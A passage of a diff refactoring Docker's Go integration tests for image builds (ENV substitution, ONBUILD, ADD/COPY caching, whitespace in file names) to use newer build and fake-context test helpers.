- name, - ` + buildImageSuccessfully(c, name, build.WithDockerfile(` FROM busybox ENTRYPOINT ["echo"] CMD echo test - `, - true) - if err != nil { - c.Fatal(err) - } - + `)) out, _ := dockerCmd(c, "run", "--rm", name) - if daemonPlatform == "windows" { - if !strings.Contains(out, "cmd /S /C echo test") { - c.Fatalf("CMD did not contain cmd /S /C echo test : %q", out) - } - } else { - if strings.TrimSpace(out) != "/bin/sh -c echo test" { - c.Fatalf("CMD did not contain /bin/sh -c : %q", out) - } + if strings.TrimSpace(out) != expected { + c.Fatalf("CMD did not contain %q : %q", expected, out) } - } func (s *DockerSuite) TestBuildEnvironmentReplacementUser(c *check.C) { @@ -76,21 +61,16 @@ func (s *DockerSuite) TestBuildEnvironmentReplacementUser(c *check.C) { testRequires(c, DaemonIsLinux) name := "testbuildenvironmentreplacement" - _, err := buildImage(name, ` + buildImageSuccessfully(c, name, build.WithDockerfile(` FROM scratch ENV user foo USER ${user} - `, true) - if err != nil { - c.Fatal(err) - } - + `)) res := inspectFieldJSON(c, name, "Config.User") if res != `"foo"` { c.Fatal("User foo from environment not in Config.User on image") } - } func (s *DockerSuite) TestBuildEnvironmentReplacementVolume(c *check.C) { @@ -98,29 +78,20 @@ func (s *DockerSuite) TestBuildEnvironmentReplacementVolume(c *check.C) { var volumePath string - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { volumePath = "c:/quux" } else { volumePath = "/quux" } - _, err := buildImage(name, ` + buildImageSuccessfully(c, name, build.WithDockerfile(` FROM `+minimalBaseImage()+` ENV volume `+volumePath+` VOLUME ${volume} - `, true) - if err != nil { - c.Fatal(err) - } - - res := inspectFieldJSON(c, name, "Config.Volumes") + `)) var volumes map[string]interface{} - - if err := json.Unmarshal([]byte(res), &volumes); err != nil { - c.Fatal(err) - } - + inspectFieldAndUnmarshall(c, name, "Config.Volumes", &volumes) if _, ok := volumes[volumePath]; !ok { c.Fatal("Volume " + volumePath + " from environment not in Config.Volumes on image") } @@ -132,27 +103,17 @@ func (s *DockerSuite) TestBuildEnvironmentReplacementExpose(c *check.C) { testRequires(c, DaemonIsLinux) name := "testbuildenvironmentreplacement" - _, err := buildImage(name, ` + buildImageSuccessfully(c, name, build.WithDockerfile(` FROM scratch ENV port 80 EXPOSE ${port} ENV ports " 99 100 " EXPOSE ${ports} - `, true) - if err != nil { - c.Fatal(err) - } - - res := inspectFieldJSON(c, name, "Config.ExposedPorts") + `)) var exposedPorts map[string]interface{} - - if err := json.Unmarshal([]byte(res), &exposedPorts); err != nil { - c.Fatal(err) - } - + inspectFieldAndUnmarshall(c, name, "Config.ExposedPorts", &exposedPorts) exp := []int{80, 99, 100} - for _, p := range exp { tmp := fmt.Sprintf("%d/tcp", p) if _, ok := exposedPorts[tmp]; !ok { @@ -165,23 +126,28 @@ func (s *DockerSuite) TestBuildEnvironmentReplacementExpose(c *check.C) { func (s *DockerSuite) TestBuildEnvironmentReplacementWorkdir(c *check.C) { name := "testbuildenvironmentreplacement" - _, err := buildImage(name, ` + buildImageSuccessfully(c, name, build.WithDockerfile(` FROM busybox ENV MYWORKDIR /work RUN mkdir ${MYWORKDIR} WORKDIR ${MYWORKDIR} - `, true) + `)) + res := inspectFieldJSON(c, name, "Config.WorkingDir") - if err != nil { - c.Fatal(err) + expected := `"/work"` + if testEnv.OSType == "windows" { + expected = `"C:\\work"` + } + if res != expected { + c.Fatalf("Workdir /workdir from environment not in Config.WorkingDir on image: %s", res) } - } func (s *DockerSuite) TestBuildEnvironmentReplacementAddCopy(c *check.C) { name := "testbuildenvironmentreplacement" - ctx, err := fakeContext(` + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", ` FROM `+minimalBaseImage()+` ENV baz foo ENV quux bar @@ -193,23 +159,12 @@ func (s *DockerSuite) TestBuildEnvironmentReplacementAddCopy(c *check.C) { COPY ${quux} ${dot} ADD ${zzz:-${fee}} ${dot} COPY ${zzz:-${gee}} ${dot} - `, - map[string]string{ - "foo": "test1", - "bar": "test2", - "fff": "test3", - "ggg": "test4", - }) - - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } - + `), + build.WithFile("foo", "test1"), + build.WithFile("bar", "test2"), + build.WithFile("fff", "test3"), + build.WithFile("ggg", "test4"), + )) } func (s *DockerSuite) TestBuildEnvironmentReplacementEnv(c *check.C) { @@ -217,8 +172,7 @@ func (s *DockerSuite) TestBuildEnvironmentReplacementEnv(c *check.C) { testRequires(c, DaemonIsLinux) name := "testbuildenvironmentreplacement" - _, err := buildImage(name, - ` + buildImageSuccessfully(c, name, build.WithDockerfile(` FROM busybox ENV foo zzz ENV bar ${foo} @@ -231,20 +185,18 @@ func (s *DockerSuite) TestBuildEnvironmentReplacementEnv(c *check.C) { RUN [ "$abc3" = '$foo' ] && (echo "$abc3" | grep -q foo) ENV abc4 "\$foo" RUN [ "$abc4" = '$foo' ] && (echo "$abc4" | grep -q foo) - `, true) - - if err != nil { - c.Fatal(err) - } - - res := inspectFieldJSON(c, name, "Config.Env") - - envResult := []string{} - - if err = json.Unmarshal([]byte(res), &envResult); err != nil { - c.Fatal(err) - } - + ENV foo2="abc\def" + RUN [ "$foo2" = 'abc\def' ] + ENV foo3="abc\\def" + RUN [ "$foo3" = 'abc\def' ] + ENV foo4='abc\\def' + RUN [ "$foo4" = 'abc\\def' ] + ENV foo5='abc\def' + RUN [ "$foo5" = 'abc\def' ] + `)) + + var envResult []string + inspectFieldAndUnmarshall(c, name, "Config.Env", &envResult) found := false envCount := 0 @@ -258,7 +210,7 @@ func (s *DockerSuite) TestBuildEnvironmentReplacementEnv(c *check.C) { } else if strings.HasPrefix(parts[0], "env") { envCount++ if parts[1] != "zzz" { - c.Fatalf("%s should be 'foo' but instead its %q", parts[0], parts[1]) + c.Fatalf("%s should be 'zzz' but instead its %q", parts[0], parts[1]) } } else if strings.HasPrefix(parts[0], "env") { envCount++ @@ -278,114 +230,70 @@ func (s *DockerSuite) TestBuildEnvironmentReplacementEnv(c *check.C) { } -func (s *DockerSuite) TestBuildHandleEscapes(c *check.C) { +func (s *DockerSuite) TestBuildHandleEscapesInVolume(c *check.C) { // The volume paths used in this test are invalid on Windows testRequires(c, DaemonIsLinux) name := "testbuildhandleescapes" - _, err := buildImage(name, - ` - FROM scratch - ENV FOO bar - VOLUME ${FOO} - `, true) - - if err != nil { - c.Fatal(err) - } - - var result map[string]map[string]struct{} - - res := inspectFieldJSON(c, name, "Config.Volumes") - - if err = json.Unmarshal([]byte(res), &result); err != nil { - c.Fatal(err) - } - - if _, ok := result["bar"]; !ok { - c.Fatalf("Could not find volume bar set from env foo in volumes table, got %q", result) - } - - deleteImages(name) - - _, err = buildImage(name, - ` - FROM scratch - ENV FOO bar - VOLUME \${FOO} - `, true) - - if err != nil { - c.Fatal(err) - } - - res = inspectFieldJSON(c, name, "Config.Volumes") - - if err = json.Unmarshal([]byte(res), &result); err != nil { - c.Fatal(err) - } - - if _, ok := result["${FOO}"]; !ok { - c.Fatalf("Could not find volume ${FOO} set from env foo in volumes table, got %q", result) + testCases := []struct { + volumeValue string + expected string + }{ + { + volumeValue: "${FOO}", + expected: "bar", + }, + { + volumeValue: `\${FOO}`, + expected: "${FOO}", + }, + // this test in particular provides *7* backslashes and expects 6 to come back. + // Like above, the first escape is swallowed and the rest are treated as + // literals, this one is just less obvious because of all the character noise. + { + volumeValue: `\\\\\\\${FOO}`, + expected: `\\\${FOO}`, + }, } - deleteImages(name) - - // this test in particular provides *7* backslashes and expects 6 to come back. - // Like above, the first escape is swallowed and the rest are treated as - // literals, this one is just less obvious because of all the character noise. - - _, err = buildImage(name, - ` + for _, tc := range testCases { + buildImageSuccessfully(c, name, build.WithDockerfile(fmt.Sprintf(` FROM scratch ENV FOO bar - VOLUME \\\\\\\${FOO} - `, true) - - if err != nil { - c.Fatal(err) - } - - res = inspectFieldJSON(c, name, "Config.Volumes") + VOLUME %s + `, tc.volumeValue))) - if err = json.Unmarshal([]byte(res), &result); err != nil { - c.Fatal(err) - } + var result map[string]map[string]struct{} + inspectFieldAndUnmarshall(c, name, "Config.Volumes", &result) + if _, ok := result[tc.expected]; !ok { + c.Fatalf("Could not find volume %s set from env foo in volumes table, got %q", tc.expected, result) + } - if _, ok := result[`\\\${FOO}`]; !ok { - c.Fatalf(`Could not find volume \\\${FOO} set from env foo in volumes table, got %q`, result) + // Remove the image for the next iteration + dockerCmd(c, "rmi", name) } - } func (s *DockerSuite) TestBuildOnBuildLowercase(c *check.C) { name := "testbuildonbuildlowercase" name2 := "testbuildonbuildlowercase2" - _, err := buildImage(name, - ` + buildImageSuccessfully(c, name, build.WithDockerfile(` FROM busybox onbuild run echo quux - `, true) - - if err != nil { - c.Fatal(err) - } + `)) - _, out, err := buildImageWithOut(name2, fmt.Sprintf(` + result := buildImage(name2, build.WithDockerfile(fmt.Sprintf(` FROM %s - `, name), true) - - if err != nil { - c.Fatal(err) - } + `, name))) + result.Assert(c, icmd.Success) - if !strings.Contains(out, "quux") { - c.Fatalf("Did not receive the expected echo text, got %s", out) + if !strings.Contains(result.Combined(), "quux") { + c.Fatalf("Did not receive the expected echo text, got %s", result.Combined()) } - if strings.Contains(out, "ONBUILD ONBUILD") { - c.Fatalf("Got an ONBUILD ONBUILD error with no error: got %s", out) + if strings.Contains(result.Combined(), "ONBUILD ONBUILD") { + c.Fatalf("Got an ONBUILD ONBUILD error with no error: got %s", result.Combined()) } } @@ -394,20 +302,13 @@ func (s *DockerSuite) TestBuildEnvEscapes(c *check.C) { // ENV expansions work differently in Windows testRequires(c, DaemonIsLinux) name := "testbuildenvescapes" - _, err := buildImage(name, - ` + buildImageSuccessfully(c, name, build.WithDockerfile(` FROM busybox ENV TEST foo CMD echo \$ - `, - true) - - if err != nil { - c.Fatal(err) - } + `)) out, _ := dockerCmd(c, "run", "-t", name) - if strings.TrimSpace(out) != "$" { c.Fatalf("Env TEST was not overwritten with bar when foo was supplied to dockerfile: was %q", strings.TrimSpace(out)) } @@ -418,77 +319,48 @@ func (s *DockerSuite) TestBuildEnvOverwrite(c *check.C) { // ENV expansions work differently in Windows testRequires(c, DaemonIsLinux) name := "testbuildenvoverwrite" - - _, err := buildImage(name, - ` + buildImageSuccessfully(c, name, build.WithDockerfile(` FROM busybox ENV TEST foo CMD echo ${TEST} - `, - true) - - if err != nil { - c.Fatal(err) - } + `)) out, _ := dockerCmd(c, "run", "-e", "TEST=bar", "-t", name) - if strings.TrimSpace(out) != "bar" { c.Fatalf("Env TEST was not overwritten with bar when foo was supplied to dockerfile: was %q", strings.TrimSpace(out)) } } +// FIXME(vdemeester) why we disabled cache here ? func (s *DockerSuite) TestBuildOnBuildCmdEntrypointJSON(c *check.C) { name1 := "onbuildcmd" name2 := "onbuildgenerated" - _, err := buildImage(name1, ` + cli.BuildCmd(c, name1, build.WithDockerfile(` FROM busybox ONBUILD CMD ["hello world"] ONBUILD ENTRYPOINT ["echo"] -ONBUILD RUN ["true"]`, - false) - - if err != nil { - c.Fatal(err) - } - - _, err = buildImage(name2, fmt.Sprintf(`FROM %s`, name1), false) - - if err != nil { - c.Fatal(err) - } - - out, _ := dockerCmd(c, "run", name2) +ONBUILD RUN ["true"]`)) - if !regexp.MustCompile(`(?m)^hello world`).MatchString(out) { - c.Fatalf("did not get echo output from onbuild. Got: %q", out) - } + cli.BuildCmd(c, name2, build.WithDockerfile(fmt.Sprintf(`FROM %s`, name1))) + result := cli.DockerCmd(c, "run", name2) + result.Assert(c, icmd.Expected{Out: "hello world"}) } +// FIXME(vdemeester) why we disabled cache here ? func (s *DockerSuite) TestBuildOnBuildEntrypointJSON(c *check.C) { name1 := "onbuildcmd" name2 := "onbuildgenerated" - _, err := buildImage(name1, ` + buildImageSuccessfully(c, name1, build.WithDockerfile(` FROM busybox -ONBUILD ENTRYPOINT ["echo"]`, - false) - - if err != nil { - c.Fatal(err) - } - - _, err = buildImage(name2, fmt.Sprintf("FROM %s\nCMD [\"hello world\"]\n", name1), false) +ONBUILD ENTRYPOINT ["echo"]`)) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name2, build.WithDockerfile(fmt.Sprintf("FROM %s\nCMD [\"hello world\"]\n", name1))) out, _ := dockerCmd(c, "run", name2) - if !regexp.MustCompile(`(?m)^hello world`).MatchString(out) { c.Fatal("got malformed output from onbuild", out) } @@ -498,70 +370,51 @@ ONBUILD ENTRYPOINT ["echo"]`, func (s *DockerSuite) TestBuildCacheAdd(c *check.C) { testRequires(c, DaemonIsLinux) // Windows doesn't have httpserver image yet name := "testbuildtwoimageswithadd" - server, err := fakeStorage(map[string]string{ + server := fakestorage.New(c, "", fakecontext.WithFiles(map[string]string{ "robots.txt": "hello", "index.html": "world", - }) - if err != nil { - c.Fatal(err) - } + })) defer server.Close() - if _, err := buildImage(name, - fmt.Sprintf(`FROM scratch - ADD %s/robots.txt /`, server.URL()), - true); err != nil { - c.Fatal(err) - } - if err != nil { - c.Fatal(err) - } - deleteImages(name) - _, out, err := buildImageWithOut(name, - fmt.Sprintf(`FROM scratch - ADD %s/index.html /`, server.URL()), - true) - if err != nil { - c.Fatal(err) - } - if strings.Contains(out, "Using cache") { + cli.BuildCmd(c, name, build.WithDockerfile(fmt.Sprintf(`FROM scratch + ADD %s/robots.txt /`, server.URL()))) + + result := cli.Docker(cli.Build(name), build.WithDockerfile(fmt.Sprintf(`FROM scratch + ADD %s/index.html /`, server.URL()))) + result.Assert(c, icmd.Success) + if strings.Contains(result.Combined(), "Using cache") { c.Fatal("2nd build used cache on ADD, it shouldn't") } - } func (s *DockerSuite) TestBuildLastModified(c *check.C) { + // Temporary fix for #30890. TODO @jhowardmsft figure out what + // has changed in the master busybox image. + testRequires(c, DaemonIsLinux) + name := "testbuildlastmodified" - server, err := fakeStorage(map[string]string{ + server := fakestorage.New(c, "", fakecontext.WithFiles(map[string]string{ "file": "hello", - }) - if err != nil { - c.Fatal(err) - } + })) defer server.Close() var out, out2 string + args := []string{"run", name, "ls", "-l", "--full-time", "/file"} dFmt := `FROM busybox ADD %s/file /` - dockerfile := fmt.Sprintf(dFmt, server.URL()) - if _, _, err = buildImageWithOut(name, dockerfile, false); err != nil { - c.Fatal(err) - } - - out, _ = dockerCmd(c, "run", name, "ls", "-le", "/file") + cli.BuildCmd(c, name, build.WithoutCache, build.WithDockerfile(dockerfile)) + out = cli.DockerCmd(c, args...).Combined() // Build it again and make sure the mtime of the file didn't change. // Wait a few seconds to make sure the time changed enough to notice time.Sleep(2 * time.Second) - if _, _, err = buildImageWithOut(name, dockerfile, false); err != nil { - c.Fatal(err) - } - out2, _ = dockerCmd(c, "run", name, "ls", "-le", "/file") + cli.BuildCmd(c, name, build.WithoutCache, build.WithDockerfile(dockerfile)) + out2 = cli.DockerCmd(c, args...).Combined() if out != out2 { c.Fatalf("MTime changed:\nOrigin:%s\nNew:%s", out, out2) @@ -569,20 +422,14 @@ ADD %s/file /` // Now 'touch' the file and make sure the timestamp DID change this time // Create a new fakeStorage instead of just using Add() to help windows - server, err = fakeStorage(map[string]string{ + server = fakestorage.New(c, "", fakecontext.WithFiles(map[string]string{ "file": "hello", - }) - if err != nil { - c.Fatal(err) - } + })) defer server.Close() dockerfile = fmt.Sprintf(dFmt, server.URL()) - - if _, _, err = buildImageWithOut(name, dockerfile, false); err != nil { - c.Fatal(err) - } - out2, _ = dockerCmd(c, "run", name, "ls", "-le", "/file") + cli.BuildCmd(c, name, build.WithoutCache, build.WithDockerfile(dockerfile)) + out2 = cli.DockerCmd(c, args...).Combined() if out == out2 { c.Fatalf("MTime didn't change:\nOrigin:%s\nNew:%s", out, out2) @@ -596,28 +443,20 @@ ADD %s/file /` func (s *DockerSuite) TestBuildModifyFileInFolder(c *check.C) { name := "testbuildmodifyfileinfolder" - ctx, err := fakeContext(`FROM busybox + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(`FROM busybox RUN ["mkdir", "/test"] -ADD folder/file /test/changetarget`, - map[string]string{}) - if err != nil { - c.Fatal(err) - } +ADD folder/file /test/changetarget`)) defer ctx.Close() if err := ctx.Add("folder/file", "first"); err != nil { c.Fatal(err) } - id1, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx)) + id1 := getIDByName(c, name) if err := ctx.Add("folder/file", "second"); err != nil { c.Fatal(err) } - id2, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx)) + id2 := getIDByName(c, name) if id1 == id2 { c.Fatal("cache was used even though file contents in folder was changed") } @@ -625,8 +464,8 @@ ADD folder/file /test/changetarget`, func (s *DockerSuite) TestBuildAddSingleFileToRoot(c *check.C) { testRequires(c, DaemonIsLinux) // Linux specific test - name := "testaddimg" - ctx, err := fakeContext(fmt.Sprintf(`FROM busybox + buildImageSuccessfully(c, "testaddimg", build.WithBuildContext(c, + build.WithFile("Dockerfile", fmt.Sprintf(`FROM busybox RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd RUN echo 'dockerio:x:1001:' >> /etc/group RUN touch /exists @@ -634,37 +473,24 @@ RUN chown dockerio.dockerio /exists ADD test_file / RUN [ $(ls -l /test_file | awk '{print $3":"$4}') = 'root:root' ] RUN [ $(ls -l /test_file | awk '{print $1}') = '%s' ] -RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod), - map[string]string{ - "test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod)), + build.WithFile("test_file", "test1"))) } // Issue #3960: "ADD src ." hangs func (s *DockerSuite) TestBuildAddSingleFileToWorkdir(c *check.C) { name := "testaddsinglefiletoworkdir" - ctx, err := fakeContext(`FROM busybox -ADD test_file .`, - map[string]string{ + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile( + `FROM busybox + ADD test_file .`), + fakecontext.WithFiles(map[string]string{ "test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } + })) defer ctx.Close() errChan := make(chan error) go func() { - _, err := buildImageFromContext(name, ctx, true) - errChan <- err + errChan <- buildImage(name, build.WithExternalBuildContext(ctx)).Error close(errChan) }() select { @@ -677,8 +503,8 @@ ADD test_file .`, func (s *DockerSuite) TestBuildAddSingleFileToExistDir(c *check.C) { testRequires(c, DaemonIsLinux) // Linux specific test - name := "testaddsinglefiletoexistdir" - ctx, err := fakeContext(`FROM busybox + cli.BuildCmd(c, "testaddsinglefiletoexistdir", build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM busybox RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd RUN echo 'dockerio:x:1001:' >> /etc/group RUN mkdir /exists @@ -687,32 +513,19 @@ RUN chown -R dockerio.dockerio /exists ADD test_file /exists/ RUN [ $(ls -l / | grep exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ] RUN [ $(ls -l /exists/test_file | awk '{print $3":"$4}') = 'root:root' ] -RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, - map[string]string{ - "test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`), + build.WithFile("test_file", "test1"))) } func (s *DockerSuite) TestBuildCopyAddMultipleFiles(c *check.C) { testRequires(c, DaemonIsLinux) // Linux specific test - server, err := fakeStorage(map[string]string{ + server := fakestorage.New(c, "", fakecontext.WithFiles(map[string]string{ "robots.txt": "hello", - }) - if err != nil { - c.Fatal(err) - } + })) defer server.Close() - name := "testcopymultiplefilestofile" - ctx, err := fakeContext(fmt.Sprintf(`FROM busybox + cli.BuildCmd(c, "testcopymultiplefilestofile", build.WithBuildContext(c, + build.WithFile("Dockerfile", fmt.Sprintf(`FROM busybox RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd RUN echo 'dockerio:x:1001:' >> /etc/group RUN mkdir /exists @@ -723,141 +536,75 @@ ADD test_file3 test_file4 %s/robots.txt /exists/ RUN [ $(ls -l / | grep exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ] RUN [ $(ls -l /exists/test_file1 | awk '{print $3":"$4}') = 'root:root' ] RUN [ $(ls -l /exists/test_file2 | awk '{print $3":"$4}') = 'root:root' ] - RUN [ $(ls -l /exists/test_file3 | awk '{print $3":"$4}') = 'root:root' ] RUN [ $(ls -l /exists/test_file4 | awk '{print $3":"$4}') = 'root:root' ] RUN [ $(ls -l /exists/robots.txt | awk '{print $3":"$4}') = 'root:root' ] - RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ] -`, server.URL()), - map[string]string{ - "test_file1": "test1", - "test_file2": "test2", - "test_file3": "test3", - "test_file4": "test4", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +`, server.URL())), + build.WithFile("test_file1", "test1"), + build.WithFile("test_file2", "test2"), + build.WithFile("test_file3", "test3"), + build.WithFile("test_file3", "test3"), + build.WithFile("test_file4", "test4"))) } -// This test is mainly for user namespaces to verify that new directories +// These tests are mainly for user namespaces to verify that new directories // are created as the remapped root uid/gid pair -func (s *DockerSuite) TestBuildAddToNewDestination(c *check.C) { - testRequires(c, DaemonIsLinux) // Linux specific test - name := "testaddtonewdest" - ctx, err := fakeContext(`FROM busybox -ADD . /new_dir -RUN ls -l / -RUN [ $(ls -l / | grep new_dir | awk '{print $3":"$4}') = 'root:root' ]`, - map[string]string{ - "test_dir/test_file": "test file", - }) - if err != nil { - c.Fatal(err) +func (s *DockerSuite) TestBuildUsernamespaceValidateRemappedRoot(c *check.C) { + testRequires(c, DaemonIsLinux) + testCases := []string{ + "ADD . /new_dir", + "COPY test_dir /new_dir", + "WORKDIR /new_dir", } - defer ctx.Close() + name := "testbuildusernamespacevalidateremappedroot" + for _, tc := range testCases { + cli.BuildCmd(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", fmt.Sprintf(`FROM busybox +%s +RUN [ $(ls -l / | grep new_dir | awk '{print $3":"$4}') = 'root:root' ]`, tc)), + build.WithFile("test_dir/test_file", "test file"))) - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) + cli.DockerCmd(c, "rmi", name) } } -// This test is mainly for user namespaces to verify that new directories -// are created as the remapped root uid/gid pair -func (s *DockerSuite) TestBuildCopyToNewParentDirectory(c *check.C) { - testRequires(c, DaemonIsLinux) // Linux specific test - name := "testcopytonewdir" - ctx, err := fakeContext(`FROM busybox -COPY test_dir /new_dir -RUN ls -l /new_dir -RUN [ $(ls -l / | grep new_dir | awk '{print $3":"$4}') = 'root:root' ]`, - map[string]string{ - "test_dir/test_file": "test file", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() +func (s *DockerSuite) TestBuildAddAndCopyFileWithWhitespace(c *check.C) { + testRequires(c, DaemonIsLinux) // Not currently passing on Windows + name := "testaddfilewithwhitespace" - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } -} - -// This test is mainly for user namespaces to verify that new directories -// are created as the remapped root uid/gid pair -func (s *DockerSuite) TestBuildWorkdirIsContainerRoot(c *check.C) { - testRequires(c, DaemonIsLinux) // Linux specific test - name := "testworkdirownership" - if _, err := buildImage(name, `FROM busybox -WORKDIR /new_dir -RUN ls -l / -RUN [ $(ls -l / | grep new_dir | awk '{print $3":"$4}') = 'root:root' ]`, true); err != nil { - c.Fatal(err) - } -} - -func (s *DockerSuite) TestBuildAddFileWithWhitespace(c *check.C) { - testRequires(c, DaemonIsLinux) // Not currently passing on Windows - name := "testaddfilewithwhitespace" - ctx, err := fakeContext(`FROM busybox + for _, command := range []string{"ADD", "COPY"} { + cli.BuildCmd(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", fmt.Sprintf(`FROM busybox RUN mkdir "/test dir" RUN mkdir "/test_dir" -ADD [ "test file1", "/test_file1" ] -ADD [ "test_file2", "/test file2" ] -ADD [ "test file3", "/test file3" ] -ADD [ "test dir/test_file4", "/test_dir/test_file4" ] -ADD [ "test_dir/test_file5", "/test dir/test_file5" ] -ADD [ "test dir/test_file6", "/test dir/test_file6" ] +%s [ "test file1", "/test_file1" ] +%s [ "test_file2", "/test file2" ] +%s [ "test file3", "/test file3" ] +%s [ "test dir/test_file4", "/test_dir/test_file4" ] +%s [ "test_dir/test_file5", "/test dir/test_file5" ] +%s [ "test dir/test_file6", "/test dir/test_file6" ] RUN [ $(cat "/test_file1") = 'test1' ] RUN [ $(cat "/test file2") = 'test2' ] RUN [ $(cat "/test file3") = 'test3' ] RUN [ $(cat "/test_dir/test_file4") = 'test4' ] RUN [ $(cat "/test dir/test_file5") = 'test5' ] -RUN [ $(cat "/test dir/test_file6") = 'test6' ]`, - map[string]string{ - "test file1": "test1", - "test_file2": "test2", - "test file3": "test3", - "test dir/test_file4": "test4", - "test_dir/test_file5": "test5", - "test dir/test_file6": "test6", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() +RUN [ $(cat "/test dir/test_file6") = 'test6' ]`, command, command, command, command, command, command)), + build.WithFile("test file1", "test1"), + build.WithFile("test_file2", "test2"), + build.WithFile("test file3", "test3"), + build.WithFile("test dir/test_file4", "test4"), + build.WithFile("test_dir/test_file5", "test5"), + build.WithFile("test dir/test_file6", "test6"), + )) - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) + cli.DockerCmd(c, "rmi", name) } } -func (s *DockerSuite) TestBuildCopyFileWithWhitespace(c *check.C) { - dockerfile := `FROM busybox -RUN mkdir "/test dir" -RUN mkdir "/test_dir" -COPY [ "test file1", "/test_file1" ] -COPY [ "test_file2", "/test file2" ] -COPY [ "test file3", "/test file3" ] -COPY [ "test dir/test_file4", "/test_dir/test_file4" ] -COPY [ "test_dir/test_file5", "/test dir/test_file5" ] -COPY [ "test dir/test_file6", "/test dir/test_file6" ] -RUN [ $(cat "/test_file1") = 'test1' ] -RUN [ $(cat "/test file2") = 'test2' ] -RUN [ $(cat "/test file3") = 'test3' ] -RUN [ $(cat "/test_dir/test_file4") = 'test4' ] -RUN [ $(cat "/test dir/test_file5") = 'test5' ] -RUN [ $(cat "/test dir/test_file6") = 'test6' ]` - - if daemonPlatform == "windows" { - dockerfile = `FROM ` + WindowsBaseImage + ` +func (s *DockerSuite) TestBuildCopyFileWithWhitespaceOnWindows(c *check.C) { + testRequires(c, DaemonIsWindows) + dockerfile := `FROM ` + testEnv.PlatformDefaults.BaseImage + ` RUN mkdir "C:/test dir" RUN mkdir "C:/test_dir" COPY [ "test file1", "/test_file1" ] @@ -872,40 +619,28 @@ RUN find "test3" "C:/test file3" RUN find "test4" "C:/test_dir/test_file4" RUN find "test5" "C:/test dir/test_file5" RUN find "test6" "C:/test dir/test_file6"` - } name := "testcopyfilewithwhitespace" - ctx, err := fakeContext(dockerfile, - map[string]string{ - "test file1": "test1", - "test_file2": "test2", - "test file3": "test3", - "test dir/test_file4": "test4", - "test_dir/test_file5": "test5", - "test dir/test_file6": "test6", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } + cli.BuildCmd(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", dockerfile), + build.WithFile("test file1", "test1"), + build.WithFile("test_file2", "test2"), + build.WithFile("test file3", "test3"), + build.WithFile("test dir/test_file4", "test4"), + build.WithFile("test_dir/test_file5", "test5"), + build.WithFile("test dir/test_file6", "test6"), + )) } func (s *DockerSuite) TestBuildCopyWildcard(c *check.C) { name := "testcopywildcard" - server, err := fakeStorage(map[string]string{ + server := fakestorage.New(c, "", fakecontext.WithFiles(map[string]string{ "robots.txt": "hello", "index.html": "world", - }) - if err != nil { - c.Fatal(err) - } + })) defer server.Close() - ctx, err := fakeContext(fmt.Sprintf(`FROM busybox + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(fmt.Sprintf(`FROM busybox COPY file*.txt /tmp/ RUN ls /tmp/file1.txt /tmp/file2.txt RUN [ "mkdir", "/tmp1" ] @@ -914,29 +649,22 @@ func (s *DockerSuite) TestBuildCopyWildcard(c *check.C) { RUN [ "mkdir", "/tmp2" ] ADD dir/*dir %s/robots.txt /tmp2/ RUN ls /tmp2/nest_nest_file /tmp2/robots.txt - `, server.URL()), - map[string]string{ + `, server.URL())), + fakecontext.WithFiles(map[string]string{ "file1.txt": "test1", "file2.txt": "test2", "dir/nested_file": "nested file", "dir/nested_dir/nest_nest_file": "2 times nested", "dirt": "dirty", - }) - if err != nil { - c.Fatal(err) - } + })) defer ctx.Close() - id1, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) + id1 := getIDByName(c, name) // Now make sure we use a cache the 2nd time - id2, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) + id2 := getIDByName(c, name) if id1 != id2 { c.Fatal("didn't use the cache") @@ -945,55 +673,44 @@ func (s *DockerSuite) TestBuildCopyWildcard(c *check.C) { } func (s *DockerSuite) TestBuildCopyWildcardInName(c *check.C) { - 